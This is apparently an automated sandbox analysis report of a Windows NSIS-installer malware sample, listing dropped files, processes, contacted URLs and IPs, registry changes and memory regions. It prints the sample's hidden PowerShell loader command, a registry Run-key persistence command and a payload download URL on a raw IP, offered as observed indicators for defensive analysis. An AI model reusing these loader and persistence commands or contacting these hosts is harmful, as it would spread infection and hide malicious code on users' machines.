Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
16042024124521.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Kanels.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nsp146C.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\545Ni1I
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Kanels.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4be2hais.c3u.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_su1vlfhr.ssl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abdominalia\Fontanels.kra
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abdominalia\Hosteanfald145.bde
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Afhjlper\Eclectism\Kropsvisitationens\henaandet.coc
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Afhjlper\Eclectism\Kropsvisitationens\hentydningen.mel
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Afhjlper\Eclectism\Kropsvisitationens\honningbi.opt
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Afhjlper\Eclectism\Kropsvisitationens\jasminernes.cen
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Bemyndigelsernes242\Glippende\Bernhardt246.kab
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Bemyndigelsernes242\Glippende\Consulter1.bru
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Bemyndigelsernes242\Glippende\Fjedrene.min
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Effektuering\Coasteren\Karryens\insupportableness\exosmose.hyp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Effektuering\Coasteren\Karryens\insupportableness\farvand.hoa
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Effektuering\Coasteren\Karryens\insupportableness\flyvecertifikaterne.neu
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Effektuering\Coasteren\Karryens\insupportableness\forbilledliges.tur
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Effektuering\Coasteren\Karryens\insupportableness\foredevote.lav
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Forhistorien183.Abe
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Lndelene228\Furthers\Vandhanens\Mastalgia.unn
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Lndelene228\Furthers\Vandhanens\Morfinen177.hal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Lndelene228\Furthers\Vandhanens\Polyuretanskum3.fod
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Lndelene228\Furthers\Vandhanens\Preevaporated41.ang
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Lndelene228\Furthers\Vandhanens\Rudi38.bve
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\formularisation.elv
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\genevese.sar
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\gleamed.pro
|
OpenPGP Public Key
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\goombah.pos
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\grvlingegrav.pil
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\haarspnde.lar
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\haengslerne.pol
|
Sky archive data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Ossiculated12\Piloterer\Stabelpladsernes\skvadderhovedernes\halvt.pha
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\barduners.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\batikkernes.sal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\boozed.san
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\bornholmerurenes.str
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\dewclaw.str
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\divertimentoets.enl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\droejde.ken
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\esophagogastrostomy.unr
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Outrede\Unconfutability\Kraftidioterne\evigtunge.non
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\bltedyrets\Pjasker\Sedating.kil
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\bltedyrets\Pjasker\Spekulationsforretningernes18.bro
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\bltedyrets\Pjasker\Teknologier.ins
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\bltedyrets\Pjasker\ankelledets.sko
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\drmmetyderes\Kipping.gul
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\galveston\Flydebroen64\irregular\Timelnnedes\Aflufter.non
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\knobbiness.sam
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\livsfilosofiernes.ove
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\mislit.toh
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\muffediser.pag
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\ophjet.flo
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\overglassur.mer
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\overskyet.ind
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\perithoracic.fri
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\persuasibleness.fat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\printerkommandos.erd
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\ringtller.rov
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\rodfordrveres.opf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\simultanscenens.hon
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\stedbrdre.oce
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\sublimats.cop
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\suppeterriner.uds
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\trichophore.bar
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\unhypothecated.pat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\upsurges.fib
|
data
|
dropped
|
There are 61 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\16042024124521.exe
|
"C:\Users\user\Desktop\16042024124521.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Delkrederekontoer=Get-Content 'C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\pakken\Abstinerende\Sensorernes\Belgier\Vildnisernes.Tom61';$Rabarberkompots=$Delkrederekontoer.SubString(42536,3);.$Rabarberkompots($Delkrederekontoer)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Kanels.exe
|
"C:\Users\user\AppData\Local\Temp\Kanels.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ
/d "%Sciurids% -windowstyle minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
|
|
|
|
C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe
|
"C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\SysWOW64\cmd.exe"
|
|
|
|
C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe
|
"C:\Program Files (x86)\dbeDhFKZVkMkDAmDTCclLrnzshLJQOeuxndUzTwfzuPIpzbHir\KQSYShJeqULXnPcQsI.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Slavocracy" /t REG_EXPAND_SZ /d "%Sciurids% -windowstyle
minimized $Miscomfort=(Get-ItemProperty -Path 'HKCU:\Massakrerede\').Apodyteria;%Sciurids% ($Miscomfort)"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
|
unknown
|
||
|
http://www.ejbodyart.com/9pdo/?Nj=1XS0Y&1fd8thFH=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU=
|
112.175.50.218
|
||
|
http://103.14.155.180/bwphkvcX154.binG
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.jt-berger.store/9pdo/
|
217.160.0.183
|
||
|
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
|
unknown
|
||
|
http://www.ftp.ftp://ftp.gopher.
|
unknown
|
||
|
http://103.14.155.180/bwphkvcX154.binx
|
unknown
|
||
|
http://103.14.155.180/bwphkvcX154.binY
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://103.14.155.180/bwphkvcX154.bin
|
103.14.155.180
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.ejbodyart.com
|
unknown
|
|
|
|
ejbodyart.com
|
112.175.50.218
|
||
|
www.jt-berger.store
|
217.160.0.183
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.14.155.180
|
unknown
|
unknown
|
||
|
217.160.0.183
|
www.jt-berger.store
|
Germany
|
||
|
112.175.50.218
|
ejbodyart.com
|
Korea Republic of
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\partiorgans\Uninstall\Perseveration159
|
enskyed
|
||
|
HKEY_CURRENT_USER\Massakrerede
|
Apodyteria
|
||
|
HKEY_CURRENT_USER\Environment
|
Sciurids
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Slavocracy
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
22FF0000
|
unclassified section
|
page execute and read and write
|
|
|
|
AC89000
|
direct allocation
|
page execute and read and write
|
|
|
|
2D00000
|
system
|
page execute and read and write
|
|
|
|
57F0000
|
system
|
page execute and read and write
|
|
|
|
3000000
|
unkown
|
page execute and read and write
|
|
|
|
35E9000
|
remote allocation
|
page execute and read and write
|
|
|
|
22980000
|
unclassified section
|
page execute and read and write
|
|
|
|
3060000
|
trusted library allocation
|
page read and write
|
|
|
|
3020000
|
trusted library allocation
|
page read and write
|
|
|
|
6FCE000
|
heap
|
page read and write
|
||
|
8236000
|
heap
|
page read and write
|
||
|
22CA0000
|
direct allocation
|
page execute and read and write
|
||
|
2272F000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
2BEF000
|
unkown
|
page read and write
|
||
|
226A0000
|
direct allocation
|
page read and write
|
||
|
2277D000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
FBE000
|
unkown
|
page read and write
|
||
|
22ED5700000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
82AE000
|
stack
|
page read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
118E000
|
heap
|
page read and write
|
||
|
E41000
|
unkown
|
page readonly
|
||
|
227BF000
|
stack
|
page read and write
|
||
|
6FC5000
|
heap
|
page read and write
|
||
|
4AF6000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
13FB4000
|
system
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED5721000
|
trusted library allocation
|
page read and write
|
||
|
2C38000
|
heap
|
page read and write
|
||
|
F0C000
|
stack
|
page read and write
|
||
|
333E000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
2BD0000
|
trusted library allocation
|
page read and write
|
||
|
1020000
|
unkown
|
page read and write
|
||
|
7040000
|
direct allocation
|
page read and write
|
||
|
FF0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
FD1000
|
unkown
|
page readonly
|
||
|
40AD000
|
unkown
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2409D000
|
unclassified section
|
page execute and read and write
|
||
|
163C000
|
stack
|
page read and write
|
||
|
E10000
|
unkown
|
page readonly
|
||
|
22A0E000
|
heap
|
page read and write
|
||
|
E50000
|
heap
|
page read and write
|
||
|
70000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
8036000
|
heap
|
page read and write
|
||
|
40C000
|
unkown
|
page read and write
|
||
|
314E000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED5580000
|
heap
|
page read and write
|
||
|
6BB0000
|
direct allocation
|
page read and write
|
||
|
22FE2000
|
direct allocation
|
page execute and read and write
|
||
|
845C000
|
stack
|
page read and write
|
||
|
DA0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
10001000
|
unkown
|
page execute read
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22E3E000
|
direct allocation
|
page execute and read and write
|
||
|
4E7000
|
heap
|
page read and write
|
||
|
22A6D000
|
heap
|
page read and write
|
||
|
22DCD000
|
direct allocation
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
2BE9000
|
remote allocation
|
page execute and read and write
|
||
|
8140000
|
trusted library allocation
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
FF0000
|
unkown
|
page readonly
|
||
|
8095000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
3710000
|
direct allocation
|
page execute and read and write
|
||
|
2EF4000
|
heap
|
page read and write
|
||
|
6EE0000
|
direct allocation
|
page read and write
|
||
|
6C00000
|
direct allocation
|
page read and write
|
||
|
7250000
|
trusted library allocation
|
page read and write
|
||
|
6E5E000
|
stack
|
page read and write
|
||
|
7FED000
|
stack
|
page read and write
|
||
|
52CF000
|
trusted library allocation
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
1660000
|
remote allocation
|
page execute and read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
4D10DFC000
|
stack
|
page read and write
|
||
|
6C50000
|
direct allocation
|
page read and write
|
||
|
6F48000
|
heap
|
page read and write
|
||
|
2A56000
|
heap
|
page read and write
|
||
|
5EE000
|
unkown
|
page execute read
|
||
|
804B000
|
heap
|
page read and write
|
||
|
E20000
|
heap
|
page read and write
|
||
|
3810000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2BE0000
|
trusted library allocation
|
page read and write
|
||
|
6FCE000
|
heap
|
page read and write
|
||
|
F0C000
|
stack
|
page read and write
|
||
|
E30000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22940000
|
direct allocation
|
page read and write
|
||
|
8350000
|
heap
|
page read and write
|
||
|
22DC9000
|
direct allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6E90000
|
direct allocation
|
page read and write
|
||
|
36CF000
|
unkown
|
page read and write
|
||
|
E00000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
21E9000
|
remote allocation
|
page execute and read and write
|
||
|
8084000
|
heap
|
page read and write
|
||
|
306C000
|
stack
|
page read and write
|
||
|
8540000
|
trusted library allocation
|
page read and write
|
||
|
22BE000
|
stack
|
page read and write
|
||
|
31CE000
|
heap
|
page read and write
|
||
|
8550000
|
trusted library allocation
|
page execute and read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
DA0000
|
unkown
|
page readonly
|
||
|
30E9000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
4D11DFE000
|
stack
|
page read and write
|
||
|
FFE000
|
unkown
|
page readonly
|
||
|
408000
|
unkown
|
page readonly
|
||
|
3360000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2350000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
E20000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
3187000
|
heap
|
page read and write
|
||
|
30F4000
|
heap
|
page read and write
|
||
|
22ED53D0000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
167E000
|
stack
|
page read and write
|
||
|
450000
|
unkown
|
page readonly
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
49A1000
|
trusted library allocation
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
2EF4000
|
heap
|
page read and write
|
||
|
1007000
|
unkown
|
page readonly
|
||
|
3689000
|
heap
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7AF000
|
stack
|
page read and write
|
||
|
22ED3C22000
|
heap
|
page read and write
|
||
|
22680000
|
direct allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
10004000
|
unkown
|
page readonly
|
||
|
3140000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
E41000
|
unkown
|
page readonly
|
||
|
17E9000
|
remote allocation
|
page execute and read and write
|
||
|
2BE2000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7EE000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
879D000
|
stack
|
page read and write
|
||
|
889F000
|
stack
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
F70000
|
unkown
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
17EF000
|
heap
|
page read and write
|
||
|
1005000
|
unkown
|
page read and write
|
||
|
2E1C000
|
stack
|
page read and write
|
||
|
6C10000
|
direct allocation
|
page read and write
|
||
|
3171000
|
heap
|
page read and write
|
||
|
7420000
|
trusted library allocation
|
page read and write
|
||
|
2FFF000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7060000
|
direct allocation
|
page read and write
|
||
|
6FC9000
|
heap
|
page read and write
|
||
|
283D000
|
stack
|
page read and write
|
||
|
229C0000
|
heap
|
page read and write
|
||
|
2E70000
|
trusted library allocation
|
page read and write
|
||
|
6E1E000
|
stack
|
page read and write
|
||
|
52BB000
|
trusted library allocation
|
page read and write
|
||
|
28C8000
|
stack
|
page read and write
|
||
|
FF1000
|
unkown
|
page execute read
|
||
|
7587000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
22ED39BC000
|
system
|
page execute and read and write
|
||
|
36FE000
|
heap
|
page read and write
|
||
|
6BF0000
|
direct allocation
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
8530000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2EF4000
|
heap
|
page read and write
|
||
|
2E90000
|
heap
|
page read and write
|
||
|
30EF000
|
heap
|
page read and write
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
5B37000
|
trusted library allocation
|
page read and write
|
||
|
6FC5000
|
heap
|
page read and write
|
||
|
2CB7000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
59C9000
|
trusted library allocation
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
2200000
|
heap
|
page read and write
|
||
|
336B000
|
heap
|
page read and write
|
||
|
849C000
|
stack
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
7603000
|
heap
|
page read and write
|
||
|
138F2000
|
system
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
38AE000
|
direct allocation
|
page execute and read and write
|
||
|
1007000
|
unkown
|
page readonly
|
||
|
2CB5000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
6BC0000
|
direct allocation
|
page read and write
|
||
|
DBC000
|
stack
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
368E000
|
stack
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
6B1E000
|
stack
|
page read and write
|
||
|
2BDA000
|
trusted library allocation
|
page execute and read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
A2F000
|
stack
|
page read and write
|
||
|
4AAD000
|
unkown
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
318B000
|
heap
|
page read and write
|
||
|
22C96000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
736D000
|
stack
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
FE0000
|
unkown
|
page read and write
|
||
|
807A000
|
heap
|
page read and write
|
||
|
FD0000
|
unkown
|
page readonly
|
||
|
32DF000
|
stack
|
page read and write
|
||
|
E0A000
|
stack
|
page read and write
|
||
|
7564000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
2F48000
|
heap
|
page read and write
|
||
|
FF1000
|
unkown
|
page execute read
|
||
|
2BE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
8075000
|
heap
|
page read and write
|
||
|
1AD0000
|
unkown
|
page readonly
|
||
|
33B1000
|
heap
|
page read and write
|
||
|
806E000
|
heap
|
page read and write
|
||
|
2E60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BB4000
|
trusted library allocation
|
page read and write
|
||
|
15F0000
|
heap
|
page read and write
|
||
|
33B1000
|
heap
|
page read and write
